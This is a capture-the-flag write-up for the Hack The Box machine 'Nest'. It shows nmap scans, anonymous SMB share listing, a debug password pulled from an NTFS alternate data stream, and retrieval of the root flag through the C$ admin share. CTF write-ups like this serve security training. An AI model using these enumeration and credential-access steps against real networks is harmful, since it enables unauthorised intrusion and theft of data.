$ sudo nmap -sS -p- 10.10.10.178 -o nmap_ports [sudo] password for noraj: Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 21:05 CET Stats: 0:04:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan SYN Stealth Scan Timing: About 28.81% done; ETC: 21:19 (0:10:03 remaining) Nmap scan report for 10.10.10.178 Host is up (0.051s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 445/tcp open microsoft-ds 4386/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 543.24 seconds
$ sudo nmap -sSVC -p 445,4386 10.10.10.178 -o nmap_services Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-23 21:24 CET Stats: 0:02:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 50.00% done; ETC: 21:28 (0:02:02 remaining) Nmap scan report for 10.10.10.178 Host is up (0.031s latency).
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command> 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4386-TCP:V=7.80%I=7%D=3/23%Time=5E791B05%P=x86_64-unknown-linux-gnu SF:%r(NULL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Gener SF:icLines,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnreco SF:gnised\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Servi SF:ce\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20 SF:command\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\ SF:.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x2 SF:0Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP SF:,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\ SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20al SF:lows\x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\ SF:x20the\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x SF:20---\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_I SF:D>\r\nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,2 SF:1,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer SF:Cookie,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSes SF:sionReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerbe SF:ros,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNe SF:g,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21 SF:,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourReque SF:st,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise SF:d\x20command\r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20 SF:V1\.2\r\n\r\n>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x2 SF:0V1\.2\r\n\r\n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20 SF:V1\.2\r\n\r\n>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1 SF:\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nH SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 206.45 seconds
So we have SMBv2 + unknown service on port 4386.
CrackMapExec, smb-enum-shares.nse and enum4linux don't find any
shares because they support only SMB v1 that is disabled.
But smbclient and msf modules works. So let's start metasploit console (msfconsole).
[+] 10.10.10.178:445 - 10.10.10.178 supports SMB 2 [dialect 255.2] and has been online for 1 hours [*] 10.10.10.178:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
I found a few SMBv2 shares with metasploit but we can do the same thing
with smbclient.
BlackArch: pacman -S smbclient
1 2 3 4 5 6 7 8 9 10 11 12 13 14
$ smbclient -L 10.10.10.178 -N Unable to initialize messaging context
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.178 failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available
We can anonymously connect to Users share and list folders in there to list
users:
1 2 3 4 5 6 7 8 9 10 11
$ smbclient -N \\\\10.10.10.178\\Users Unable to initialize messaging context Try "help" to get a list of possible commands. smb: \> recurse on smb: \> prompt off smb: \> mget * NT_STATUS_ACCESS_DENIED listing \Administrator\* NT_STATUS_ACCESS_DENIED listing \C.Smith\* NT_STATUS_ACCESS_DENIED listing \L.Frost\* NT_STATUS_ACCESS_DENIED listing \R.Thompson\* NT_STATUS_ACCESS_DENIED listing \TempUser\*
This way we found 5 users.
Currently we can't enumerate what is inside Secure share.
1 2 3
$ smbclient -N \\\\10.10.10.178\\Secure Unable to initialize messaging context tree connect failed: NT_STATUS_BAD_NETWORK_NAME
By enumerating the Data share we can find some interesting files:
1 2 3 4 5 6 7 8 9 10 11
$ smbclient -N \\\\10.10.10.178\\Data Unable to initialize messaging context Try "help" to get a list of possible commands. smb: \> recurse on smb: \> prompt off smb: \> mget * NT_STATUS_ACCESS_DENIED listing \IT\* NT_STATUS_ACCESS_DENIED listing \Production\* NT_STATUS_ACCESS_DENIED listing \Reports\* getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0,4 KiloBytes/sec) (average 0,4 KiloBytes/sec) getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0,5 KiloBytes/sec) (average 0,5 KiloBytes/sec)
By reading a welcome email we can find a generic account:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ cat smb/Shared/Templates/HR/Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.
The RU Scanner password is ciphered but pasting
fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= in a search we can find some
code snippets that are able to decipher it.
Inside Users share, in the C.Smith folder, there are files related to
HQK Reporting software.
There is a promising Debug Mode Password.txt files but the files ize is 0 byte.
This gives us an hint an ADS (Alternate Data Stream) may be used.
As you can see below the default $DATA stream is 0 byte when an alternate
stream named Password is 15 bytes. So we can download the file via the non-default
data stream.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
$ smbclient \\\\10.10.10.178\\Users -U 'c.smith' Unable to initialize messaging context Enter WORKGROUP\c.smith's password: Try "help" to get a list of possible commands. smb: \> cd "C.Smith\HQK Reporting" smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: ven. août 9 01:06:12 2019 CEST access_time: ven. août 9 01:06:12 2019 CEST write_time: ven. août 9 01:08:17 2019 CEST change_time: ven. août 9 01:08:17 2019 CEST attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$DATA" getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password:$DATA of size 15 as Debug Mode Password.txt:Password:$DATA (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec) smb: \C.Smith\HQK Reporting\>
In this stream the file contains the password for accessing the debug mode:
Let's get root flag via the C$ share with the Administrator account:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
$ smbclient '\\10.10.10.178\C$' -U 'Administrator' Unable to initialize messaging context Enter WORKGROUP\Administrator's password: Try "help" to get a list of possible commands. smb: \> cd Users\Administrator\Desktop smb: \Users\Administrator\Desktop\> ls . DR 0 Sun Jan 26 08:20:50 2020 .. DR 0 Sun Jan 26 08:20:50 2020 desktop.ini AHS 282 Sat Jan 25 23:02:44 2020 root.txt A 32 Tue Aug 6 00:27:26 2019
10485247 blocks of size 4096. 6545277 blocks available smb: \Users\Administrator\Desktop\> mget root.txt Get file root.txt? y getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)